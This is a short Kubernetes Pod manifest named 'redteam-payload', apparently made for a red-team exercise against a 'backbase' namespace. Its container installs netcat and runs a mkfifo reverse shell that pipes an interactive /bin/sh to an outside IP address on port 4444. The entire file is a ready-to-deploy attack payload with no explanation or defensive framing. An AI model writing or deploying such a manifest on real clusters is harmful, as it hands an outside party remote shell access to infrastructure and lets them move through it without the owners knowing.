apiVersion: v1
kind: Pod
metadata:
  name: redteam-payload
  namespace: backbase
spec:
  containers:
  - name: alpine
    image: alpine:latest
    command: ["/bin/sh"]
    args:
      - -c
      - |
        apk add --update netcat-openbsd
        rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 203.175.125.130 4444 > /tmp/f
  restartPolicy: Never
